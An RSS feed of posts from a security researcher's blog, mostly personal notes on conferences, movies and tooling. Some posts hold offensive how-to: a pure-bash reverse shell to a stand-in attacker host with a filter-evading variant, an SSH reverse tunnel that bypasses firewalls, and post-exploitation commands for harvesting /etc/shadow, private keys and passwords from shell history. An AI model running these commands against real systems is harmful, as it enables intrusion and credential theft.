<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet security observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
 <item><title>Media Frenzy</title><description>2009-10-22 13:39:35 - dd if=/dev/profanity: Some life-changing events going on over at the metasploit blog.</description><link>http://www.secuobs.com/revue/news/152986.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/152986.shtml</guid></item>
<item><title>Sliding Home</title><description>Secuobs.com : 2009-08-09 09:45:05 - dd if=/dev/profanity - As promised, my slides for Blackhat/Defcon 2009 have been placed in a web-accessible location: Using Guided Missiles in Drive-bys. Thanks everyone who showed up. To those who didn't, maybe I'll see you next time.</description><link>http://www.secuobs.com/revue/news/129301.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/129301.shtml</guid></item>
<item><title>Hurray for IBM</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - I bought a refurbished Thinkpad T40 in March with a 90-day manufacturer's warranty. After having it for about two months, the USB ports died and the video card started flaking out every time I pressed the machine in the wrong spot. This was about the time when finals were approaching fast and I could not live without my laptop, so I sucked it up and decided I would just pay to get it fixed out of warranty after the end of the semester. This afternoon I found the invoice and called IBM. It turns out that in IBM-land a 90-day warranty that started in March expires in October, so they are going to fix it for free. Additionally, in the past I have told Dell customer support representatives that the machine I'm calling about does not have Windows installed. Their response has pretty much universally been, "Then it's your problem, not ours." I told the IBM tech support guy the same thing and he said, "We don't care about that." Hurray for IBM.</description><link>http://www.secuobs.com/revue/news/122510.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122510.shtml</guid></item>
<item><title>Hello, I must be going</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - We've been in Idaho Falls for about three weeks now. My job is interesting and I'm enjoying my work. I haven't learned all the ropes yet (I just figured out how to fill in time cards yesterday). We're just about settled into our new house but there are still a bunch of boxes that haven't been unpacked. And now I'm going on travel for two weeks. That's not really a bad thing; it will be fun and interesting and I will probably learn a ton on my first outing. But there are a lot of things I need to do here in Idaho Falls. Mostly paperwork things, but important things nonetheless, like finding out where my paycheck goes and making sure it gets deposited before our first month's bills come due.</description><link>http://www.secuobs.com/revue/news/122509.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122509.shtml</guid></item>
<item><title>Highly Scientific Random Internet Tests</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - Apparently I'm in the 93rd percentile for nerdiness based on this Highly Scientific Random Internet Test. This is a dubious honor but one that I felt was worth sharing. I am nerdier than 92% of all people. Are you nerdier? Click here to find out.</description><link>http://www.secuobs.com/revue/news/122508.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122508.shtml</guid></item>
<item><title>Defcon 0x0E</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - Defcon was a blast. I met a bunch of cool people and got to hang out with some old friends. fednaught, a Capture the Flag team, got second place despite my help. My favorite talks were Hacking Malware: Offence is the New Defence by Danny Quist and Valsmith, and Exploit Writing Using Injectable Virtual Machines by Wes Brown and another fellow from the same organization. The latter because James and I were discussing what we would need in order to be prepared for next year's CtF only moments before going into this presentation and hearing that it had already been written.</description><link>http://www.secuobs.com/revue/news/122507.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122507.shtml</guid></item>
<item><title>Siren's call</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - In the last few weeks, we've rented a number of movies. So I will succumb to the Internet's siren-like call to publish my opinion so that all who care to read it might find something with which they disagree. In alphabetical order:
Blood Rayne - Vampires. We gave it the MST3K treatment and got our two bucks' worth.
The Ice Harvest - My executive summary: John Cusack and Billy Bob Thornton steal some money. People die. There are breasts. Might be a decent movie iff you like film noir.
Kiss Kiss Bang Bang - A good detective film with assorted twists. I was on the edge of my seat for much of this movie and laughing the rest of the time (Val Kilmer's character is called "Gay Perry"). Great movie with a solid cast, entertaining plot and funny dialogue. Highly recommended.
RV - This was billed as a slightly ridiculous comedy and it definitely lives up to that description. But it's not retarded like, say, anything Will Ferrell has ever done.
Unleashed - From the cover and the back-of-the-case description, this is your standard martial arts movie. Do not let that fool you: in addition to his incredible physical abilities, Jet Li is quite an actor and Unleashed is a phenomenal movie.</description><link>http://www.secuobs.com/revue/news/122506.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122506.shtml</guid></item>
<item><title>Vikings are not magical</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - I've been resisting the new Lego sets for a while now because of their futuristic depictions of supposedly historical eras. For example, the Knights' Kingdom II and Vikings series both have giant spring-loaded projectile weapons. Well, today I broke down and bought a Vikings set. I'm still uncertain about the ridiculous giant catapult powered by a lone viking. Launching boulders at least three times as big as himself doesn't seem within the realm of possibility for an 8th-11th century warrior, even if he is a badass. On the other hand, the armor, weapons, and non-specialty bricks are awesome. On a completely unrelated note, Willyk set me up with a new gallery account today. Check it out if you're interested. Update 2006-11-05: the gallery url has changed and now works.</description><link>http://www.secuobs.com/revue/news/122505.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122505.shtml</guid></item>
<item><title>Keyboard Dancing</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - Keyloggers are cool. Hardware keyloggers are cooler because they are undetectable to the operating system. A mark against hardware gizmos is that for them to be useful, one must install the gizmo and then retrieve it. Until now. Now it doesn't have to be retrieved. Now all one has to do is drop the gizmo and watch for traffic on the internet. Or own a keyboard manufacturing company.</description><link>http://www.secuobs.com/revue/news/122504.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122504.shtml</guid></item>
<item><title>Securosis and Daringflamebait</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - I'm constantly updating my daily blog list and today I stumbled on securosis.com. He's got decent advice for the less technically savvy (which happens to mirror a lot of what I've been telling the uninitiated for a while now). He also explained to John Gruber that the so-called challenge he proposed to Ellch and Maynor was asinine, in a far more even tone than I might have. Plus this great quote: "Give honest answers to honest questions, and when someone asks for the ROI of a firewall ask them for the ROI on their desk."</description><link>http://www.secuobs.com/revue/news/122503.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122503.shtml</guid></item>
<item><title>Tricks with SSH</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - Do you want to ssh to your NATed box at home? Want to connect in to your machine at work that drops SYN packets at the perimeter? Tired of having to live without tab-completion and other handy features when an exploit sends a shell back to netcat? SSH to the rescue. First, from the firewalled machine (call it BoxA) run:
ssh -nNT -R 2222:localhost:22 user@boxb.example.com
then on boxb.example.com:
ssh user@localhost -p2222
So what exactly does this do? Let's take a look at the relevant sections from "man ssh":
-n Redirects stdin from /dev/null (actually, prevents reading from stdin). This must be used when ssh is run in the background.
-N Do not execute a remote command. This is useful for just forwarding ports (protocol version 2 only).
-T Disable pseudo-tty allocation.
-R [bind_address:]port:host:hostport Specifies that the given port on the remote (server) host is to be forwarded to the given host and port on the local side. This works by allocating a socket to listen to port on the remote side, and whenever a connection is made to this port, the connection is forwarded over the secure channel, and a connection is made to host port hostport from the local machine. By default, the listening socket on the server will be bound to the loopback interface only. This may be overridden by specifying a bind_address.
"-nNT" means we aren't going to give ssh any input, so don't execute a shell and don't allocate a tty. -R is a little trickier: it says start forwarding port 2222 of the remote machine (BoxB) to port 22 of the machine you're running ssh from (BoxA). Now when you run ssh localhost -p2222, you're connecting to the port forward that you just set up, which sends your connection through an encrypted tunnel to BoxA, bypassing the firewall rules because the tunnel is already connected. Caveats: You're connecting to localhost from BoxB but the traffic is actually going to BoxA. This will confuse ssh, who thinks that localhost should have the same fingerprint each time. To get around this, you'll likely have to delete the line beginning with "localhost" in your ~/.ssh/known_hosts. If you're using an exploit you'll have to know the account's password (or steal an ssh key). Don't complain to me if your sysadmin gets mad and blocks outbound ssh. I love open source. They've really thought of everything.</description><link>http://www.secuobs.com/revue/news/122502.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122502.shtml</guid></item>
<item><title>On ssh and timeouts</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - It turns out that ssh by default doesn't like to stay connected forever. If you set up a port forward as described below and don't connect to it right away, one end or the other will time out (not sure which, but it doesn't really matter). To circumvent this issue, I've taken to setting up the forward, connecting to the remote box, then connecting through the port forward in a screen session, and detaching screen (or not, depending on my mood). Now ssh won't be able to tell that there's no interaction and will stay connected indefinitely. Incidentally, if you love the power of the command line and haven't heard of screen, you should install it at the earliest opportunity. Thank me later.</description><link>http://www.secuobs.com/revue/news/122501.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122501.shtml</guid></item>
<item><title>Nastier tricks with ssh</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - In my daily blog reading a week or so ago, I stumbled on Jon Hart's blog. In it, he notes the facts that root can read any file whatsoever on a *nix system and that ssh agent forwarding is accomplished using unix sockets. The corollary to this is that root (or someone with access to your account) can steal your password-protected ssh keys after you decrypt them. Having used key-based authentication on a regular basis myself, this got me to thinking about other possibilities for an unrestricted user. As it turns out, if a user can read someone else's private key file, one can authenticate with it. Long story short, I've modified Jon's code to also search out non-password-protected keyfiles and attempt to abuse them.</description><link>http://www.secuobs.com/revue/news/122500.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122500.shtml</guid></item>
<item><title>Turnabout</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - My home firewall runs an ssh server. Every few days, I go through my logs and find that someone has been attempting to guess account names and passwords on that server. For a while, I just allowed it to continue because I found it interesting to see what usernames were being guessed. After a few months of getting guess attempts every couple of seconds with almost no interruptions from dozens of ip addresses, I decided I didn't want to take the risk of somebody actually getting in and set up iptables rules to blackhole any ip address that sent more than ten SYN packets to ssh in less than two minutes. A friend pointed me to denyhosts, a tool to watch your logs for failed ssh attempts and put the offending host into your /etc/hosts.deny for a certain period of time. This is effectively the same as the iptables rules. Both of these methods are very effective but not as interesting as seeing all the usernames tried. So I downloaded the source for openssh-4.4p1 and made a few modifications. My new sshd:
- Logs all connections
- Logs usernames and passwords
- Never opens a shell no matter what
If you'd like to set this up yourself, you can download the complete source, or if you already have the source for openssh-4.4p1 and don't want to download the whole thing just for a few modifications, you can get just the diff. Then run the following commands:
tar xzvf openssh-logger.tar.gz
cd openssh-logger
./configure --prefix=/usr/honey --with-privsep-path=/usr/honey/chroot --with-pid-dir=/usr/honey/var/run
make
The purpose of putting it in a strange directory is that we don't want to hose your real ssh server. If that went well, run:
su
make install
touch /usr/honey/chroot/sshattackslog
chown sshd:sshd /usr/honey/chroot/sshattackslog
Remember: if you run a real ssh server, you'll want to change the port it listens on in your /etc/ssh/sshd_config. You can add a section to your ~/.ssh/config like this ("Host ..." and "Port ...") so your client will connect to the correct server. Now everything should be set up and you should start seeing brute force attacks in /usr/honey/chroot/sshattackslog in no more than a couple of days. Output will look something like this:
host: 1000100 port: 45677 user: root pass: root user: root pass: t00r user: root pass: r00t
Happy hunting.</description><link>http://www.secuobs.com/revue/news/122499.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122499.shtml</guid></item>
<item><title>Ephemeral (adj.): lasting for only a short period</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - Mosref (MOsquito Remote Execution Framework) is what Metasploit's Meterpreter really wants to be. It is (on paper) a platform-agnostic virtual machine and Lisp interpreter with strong encryption on top of multiple communication channels. In reality, I could never get it to compile, nor could many other people based on the conversation in the mosref mailing list. And even if I could have, I would have had to learn the Mosquito dialect of Lisp for it to be any kind of useful. After Wes Brown's and Scott Dunlop's talk about it at Defcon 14, I really wanted to see Mosquito succeed. Unfortunately, it never had any updates after that talk (the last developer cvs transaction according to SourceForge was the initial commit). The mailing list contained almost no discussion of development. This afternoon I visited ephemeralsecurity.com only to discover that the domain is now parked by an advertiser and whois lists the owner as "Domain Discreet". I was disappointed to learn this but not surprised. Oh, well. If you want a platform-independent in-memory rootkit, you'll just have to write it yourself.</description><link>http://www.secuobs.com/revue/news/122498.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122498.shtml</guid></item>
<item><title>The Perfect Phone</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - There's been a lot of hype lately about the iPhone. It looks snazzy. It has Wifi, EDGE, Bluetooth, and all the other bells and whistles a high-end phone is expected to have these days. But it's not the phone for me. Before the iPhone were several Nokia offerings that are almost up to my standards. The Treo and the Blackberry look like the same story: almost what I want but not quite. What I want in a phone are these features:
- Wifi -- preferably with a chipset that allows me to run kismet. Better yet would be one that allows me to run Lorcon and/or livetap.
- Large amounts of flash storage. I'd prefer this to be internal but I don't care what the medium is; I'll buy extra storage media without complaining too much. With as cheap as USB flash devices are getting these days, it should be a gigabyte at minimum.
- Charge over usb.
- A camera would be cool but not strictly necessary. I used to think that I would prefer a phone with no camera because some places won't allow cameras. I've recently come to realize that most places that don't allow cameras also don't allow phones.
- Bluetooth for the sole purpose of connecting to a laptop and using the phone as a bridge.
- A browser that handles javascript and flash decently. I know this isn't as big a problem as it used to be, but the five-lines-of-text-at-a-time that my old Samsung presented as "Internet" just doesn't cut it.
- A big enough screen to display many lines of text.
- Unix-like operating system. This is necessary to be able to have a useful shell.
- A good way to input text. This is necessary to be able to interact with that shell.
- Bash or the equivalent. I can do everything on the commandline faster and more efficiently.
- An ssh client. What's the point of being connected 24/7 if I can't be connected to the machines that do my bidding? This also gets me to irc and other various programs that have become tethered to my brain over the last several years.
- nmap -- this also means I need raw packets.
- A ruby interpreter.
- Other third party applications (some of which will undoubtedly be written by me).
And I want it all without having to go through the pain and discomfort of JailBreak and other forms of warranty-voiding, DMCA-violating kludges. Basically, I want my Thinkpad in a 4.5 x 2.5 x 0.5 inch, 5 ounce package that can make calls. The FIC Neo1973 looks very promising on the software front. The entire phone is open: it's based on Linux and everything from the circuit boards to the kernel to the frontend is user modifiable. That has strong appeal. Unfortunately, it has no Wifi, which makes it nearly useless to me. The second generation, which does have wifi, is advertised as being available early 2008, but since it was advertised as being available on October 1 earlier this year, I'm not holding my breath. The iPhone has nice hardware and a nice interface. But for it to be useful requires breaking laws. I boycott products that have that property in the hopes that manufacturers will start making things open enough to be useful for more than their own highly-defined and highly-limited idea of useful. The Nokia N800 looks like everything I want -- Linux-based, wifi, third party development is encouraged (hell, Immunity built a pentesting tool out of them) -- but it's not a phone. Maybe I'll just get one of these and keep my crappy free-with-service-agreement 6103. I would be much more interested in the Nokia E90 if it ran Linux. I just can't justify a thousand dollars for a phone without being sure beforehand that I'll like it.</description><link>http://www.secuobs.com/revue/news/122497.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122497.shtml</guid></item>
<item><title>base64-encrypt</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - http://www.kb.cert.org/vuls/id/180876 Base64 encoding is just that: encoding. It's a way to ensure that text with strange characters can be sent on the wire in an unambiguous, portable manner. It is not, and was never meant to be, encryption. There is no added security by encoding a password with base64, just like there is no added security by encoding a password with rot13. It is no more than obfuscation (perhaps less than obfuscation, since base64 on the wire sticks out and says, "Hey, look at me"). Taking an authentication mechanism that is secured by real encryption and sending it back out in plaintext (or, equivalently, encoded with base64) is ridiculous. So don't ever do that.</description><link>http://www.secuobs.com/revue/news/122496.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122496.shtml</guid></item>
<item><title>/bin/bashed</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - Bash can read and write pipes on a specific file descriptor, like so: "echo foo >&amp;2", which prints to file descriptor 2, and "cat foo.txt > /dev/tcp/example.com/9999" will perform a DNS lookup for example.com, attempt to connect to TCP port 9999 of the resulting IP address, and send the string "foo" to the socket. Putting these things together:
targetbox $ bin bash 3 dev tcp evilexamplecom 9999 3
and we've got a shell shoveler in pure bash, no outside executables. Catch it with:
evil $ nc -l -p 9999
Same thing, pure bash, now with no spaces for getting around input filters:
eval IFS bash IFS 0 1 3 dev tcp evilexamplecom 9999 IFS 0 1 3 IFS 0 1</description><link>http://www.secuobs.com/revue/news/122495.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122495.shtml</guid></item>
<item><title>Minimal indeed</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - Mingw, or Minimal GNU for Windows, is a really cool project. The idea is to have a gcc that will run anywhere gcc will run and can make Windows executables. It does this well, giving programmers the ability to link native Windows libraries in a non-windows environment. It differs from the standard gcc in a significant way that I discovered this evening: order of arguments is quite important. Whereas standard gcc will accept "gcc code_that_uses_math_dot_h.c -lm" and "gcc -lm code_that_uses_math_dot_h.c" as meaning exactly the same thing, mingw32-gcc is not so forgiving.
egypt@bastet $ cat mintest.c
#if defined(_WIN32)
#include &lt;...&gt;
#else
typedef int SOCKET;
#include &lt;...&gt;
#endif
#include &lt;...&gt;
#include &lt;...&gt;
#define PORT 1234
int main() {
    struct sockaddr_in saddr;
    SOCKET s;
    SOCKET client;
#if defined(_WIN32)
    WSADATA w;
    WSAStartup(0x101, &amp;w);
#endif
    printf("Hello world\n");
#if defined(_WIN32)
    WSACleanup();
#endif
    return 0;
}
egypt@bastet $ mingw32-gcc -lws2_32 mintest.c -o mintest.exe
/tmp/cc7dCAKg.o:mintest.c:(.text+0x29): undefined reference to `WSAStartup@8'
/tmp/cc7dCAKg.o:mintest.c:(.text+0x41): undefined reference to `WSACleanup@0'
collect2: ld returned 1 exit status
egypt@bastet [1] $ ls -l mintest.exe
ls: cannot access mintest.exe: No such file or directory
egypt@bastet $ mingw32-gcc mintest.c -lws2_32 -o mintest.exe
egypt@bastet $ ls -l mintest.exe
-rwxr-xr-x 1 egypt egypt 13K Mar 11 21:50 mintest.exe
egypt@bastet $ file mintest.exe
mintest.exe: MS-DOS executable PE  for MS Windows (console) Intel 80386 32-bit
egypt@bastet $
The moral of the story is this: if you're having trouble getting mingw to properly link a library, put the .c as your first argument. (me grumbles)</description><link>http://www.secuobs.com/revue/news/122494.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122494.shtml</guid></item>
<item><title>100 UNIX commands to issue on other people's systems</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - In response to Halvar Flake's request. I'm not sure about 100, but there are a few that I use on any new system, mostly just basics that are useful on any multi-user environment: ifconfig -a, netstat -pan --inet, uname -a, w, id, mount, ps auxww. These tell you a lot about the system and where you might go from there for further exploitation. ifconfig, like ipconfig on Windows, can tell you if the system has a NIC on another network and netstat can tell you if it's talking to one. It's important to note that options to netstat vary from one OS to another -- the above options will list all AF_INET sockets along with associated process IDs on Linux without doing DNS lookups. On Solaris and AIX it is not possible to see PIDs, and the command to list all AF_INET sockets without doing DNS lookups is netstat -an -finet. uname tells you the OS name and kernel version. w (or its cousin who) will let you know if someone might be watching. id is whoami on steroids: it gives uid, gid, and a list of groups you belong to. mount tells you how the system's storage is laid out and whether there are any removable drives attached at the moment. ps lists processes and the argument tells it to list all of them, including arguments, with the owner's username. If you're lucky, sometimes you see things like this:
root 21810 0.0 0.4 6984 2452 pts/10 S 21:13 0:00 mysql -uroot -ppassword
Then we come to interesting files. Obviously /etc/passwd and /etc/shadow are of interest. But so are slightly more obscure things like /home/*/.ssh/id_rsa (private keys) and /tmp/ssh-* (ssh-agent auth sockets). I mentioned some abuses of these files about a year and a half ago. I suggest a viewing of HD Moore and Valsmith's Blackhat 2007 talk, Tactical Exploitation, for some more fun things to do with ssh and kerberos. Finding interesting files can sometimes be a problem, so we have find to help us out. For instance, if you want to list all of the binaries you have permission to read with the setuid bit set: find / -perm 0400 2>/dev/null. All files with password or passwd in their name: find / -iname '*passwd*' -or -iname '*password*'. If you worry about leaving commands in a history file, you'll probably want to unset HISTFILE. On the other hand, sometimes the history helps an attacker, too. In bash the command history lists all of the commands in the history file. So history | grep -A1 ' ssh' and history | grep -A1 ' su' can often yield passwords when the user whose account you've compromised doesn't pay attention to make sure the password prompt actually came up before typing. A few more commands that are really cool but are less likely to be installed include lsof and screen.</description><link>http://www.secuobs.com/revue/news/122493.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122493.shtml</guid></item>
<item><title>Torontosploit</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - While attending SecTor, I finally met HD Moore in person after having been a core developer for Metasploit for almost eight months. I had been introduced to him at Defcon a couple of years ago but we didn't actually talk, so it doesn't count. Over beers, he asked me to co-present "Metasploit Prime," a discussion of new features available in the upcoming Metasploit 3.2 release. The release itself will be announced in the next few days. Slides (pdf) and video (wmv) for that presentation are now available. The video is actually just audio over the slides, which is somewhat disappointing. This is a gripe I've had with Blackhat for many years and Sector made the same mistake. Regardless of that little issue, Sector was a blast. I learned some stuff and had a great time in Toronto hanging out with HD, Jay Beale, Mark Fabro, and a bunch of other incredibly smart guys. SecTor is much smaller than Defcon (which is the only other security conference I've been to) and I really liked the tighter knit crowd -- it makes it much easier to meet people. It was considerably less technical but I enjoyed it nonetheless. At Defcon, I mostly just hung out with people I already knew because the crowds were so daunting, while at Sector it was easy to meet the rockstar presenters as well as lesser-known attending geniuses. Because of my experience at Sector, I will certainly look at smaller conferences in a new light.</description><link>http://www.secuobs.com/revue/news/122492.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122492.shtml</guid></item>
<item><title>Tag, you're it</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - When I started writing ruby I missed the convenience of a tags file for jumping around in vim to different parts of a project. After a bit of digging I found rtags to replace my beloved exuberant-ctags. Today I updated my metasploit trunk and, since it had been a while since I had updated tags, I also ran rtags. Normally rtags is slow. Running it in the metasploit source tree typically takes several minutes. Today it seemed to hit infinite loops in multiple files, taking more than ten minutes on a single file before I killed it, added that file to the exclude list, ran it again and walked away for a while. After running into this a dozen times or so over the course of the day, I decided to switch tactics. As it turns out, exuberant-ctags has support for ruby, and probably has had it since before I started using rtags.
root@framework3 # time ctags --exclude '.svn' --exclude documentation --exclude external --exclude data --recurse
real 0m0.742s
user 0m0.616s
sys 0m0.092s
(sigh)</description><link>http://www.secuobs.com/revue/news/122491.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122491.shtml</guid></item>
<item><title>obj.grabAnkles</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - As far as I can tell, it is impossible to determine whether an ActiveX object created by classid actually works without just calling specific methods of that control and catching any exceptions. It doesn't seem to matter whether it was created with an object tag, or through javascript's document.createElement("object") or document.write(). Internet Explorer turns anything with an id attribute into a property of document, and yet document.foo advertises no property or method that is not available from an object with no classid. For those of you playing at home, yes, this classid is one of the vulnerable ActiveX controls used in the MDAC / ie_createobject exploits. If the object actually got instantiated correctly and we can talk to it, typeof document.foo.CreateObject returns "unknown" rather than the "undefined" returned for properties that don't exist. So if we know a specific method that the ActiveX implements, we can check to make sure it worked using that. It is unfortunate, then, that there does not seem to be a standard method or property that all ActiveX objects must implement. Unless I'm missing something, because of the lack of a universal method or property, we cannot generically determine whether an ActiveX control created in this way was successfully instantiated. Thus, my "solution" for now is to save a method to test along with the classid. If this doesn't work, I just might give up on browser_autopwn's fingerprinting altogether and simply throw every single exploit at the client. And also maybe shoot myself. I really hate IE.</description><link>http://www.secuobs.com/revue/news/122490.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122490.shtml</guid></item>
<item><title>rubuntu</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - The Ubuntu package ruby1.8 does not install an executable called ruby. It is expected that users install the package ruby, which depends on ruby1.8 and installs a single file: a symlink called /usr/bin/ruby that points to /usr/bin/ruby1.8.</description><link>http://www.secuobs.com/revue/news/122489.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122489.shtml</guid></item>
<item><title>VMWare keyboard issues</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - I've been fighting with keyboard issues in VMWare since I started using Ubuntu. I'm not sure if the problems are specific to Ubuntu or if they were just introduced around the time I moved away from Gentoo, but either way, it's really annoying. First, VMWare would occasionally not recognize keys correctly in guests. The down arrow would become the windows key, shift would become ctrl, and alt, home, end, pgup, pgdn and the rest of the arrow keys would appear to quit functioning altogether. Outside of the guest, everything was fine. The fix for that was to tell VMWare to use the keymap provided by X instead of trying to figure it out. Open up ~/.vmware/config with your favorite editor (creating it if it doesn't exist) and add the following line: xkeymap.noKeycodeMap = TRUE. Thanks to http://nthrbldyblg.blogspot.com/2008/06/vmware-and-fubar-keyboard-effect.html for this one. Next, VMWare would occasionally cause all of the same keys from the previous bug either to stop working or to act as though they are permanently pressed in the host. After playing with this bug for a while I found that it happens most reliably when coming out of full-screen mode. There's no real solution for this one, but running setxkbmap from a terminal fixes it. The vmware forums have a thread about this issue. Since I sometimes can't type when this bug strikes (e.g. when ctrl is stuck), I added a launcher to my gnome panel so that a single mouse click can give me my keyboard back. Lastly, when using ctrl-g to have vmware grab input, it never releases the g key. I haven't found a fix for this (except to avoid using ctrl-g) and the only way I've found to get a working desktop back is to ssh in from another machine and killall vmware.</description><link>http://www.secuobs.com/revue/news/122488.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122488.shtml</guid></item>
<item><title>A Dark-colored Chapeau</title><description>Secuobs.com : 2009-07-20 02:53:36 - dd if=/dev/profanity - I'm making this post in the vain hope that someone cares about what security conference topics I find interesting. With that being said, Blackhat is going to be awesome this year, not least because of the Metasploit track. Without further ado, here are the talks I plan to attend. Day One: I'm presenting at 13:45 and, judging by my history, I probably won't be done with my slides until about 13:43, so I'm planning to miss all of the morning stuff. 15:15 Stefan Esser: State of the Art Post Exploitation in Hardened PHP Environments. This is a tough choice and I may end up flipping on it later. Valsmith and Colin's stuff is freaking awesome but I think Esser's work could end up being really useful for PHP meterpreter. 16:45 Valsmith, Ames, Kerb: Metaphish pt. 2. I hope I can get into the room after the break. Day Two: 10:00 Datagram: Lockpicking Forensics. Lockpicking is a terrifically fun hobby and I'd like to learn more about it. 11:15 Nick Harbour: Win at Reversing. I usually lose. 13:45 Danny Quist &amp; Lorie Liebrock: Reverse Engineering by Crayon. Dr. Liebrock was a professor of mine and Danny is one of the best Reverse Engineers I've ever met. Can't miss this one. 15:15 Kostya Kortchinsky: Cloudburst - Hacking 3D and Breaking out of VMware. I'm not especially interested in VMware but Kostya Kortchinsky is an exploit machine. If I die half as good as Kostya is today, I'll be happy. 16:45 Vincenzo Iozzo &amp; Charlie Miller: Post Exploitation Bliss - Loading Meterpreter on a Factory iPhone. Meterpreter is awesome and having the same post-exploitation toolkit available on multiple platforms is something I've wanted for a long time. The fact that these guys ported it to a tiny embedded device that frequently gets connected to tons of open wifi networks is an extra bonus.</description><link>http://www.secuobs.com/revue/news/122487.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122487.shtml</guid></item>
</channel>
</rss>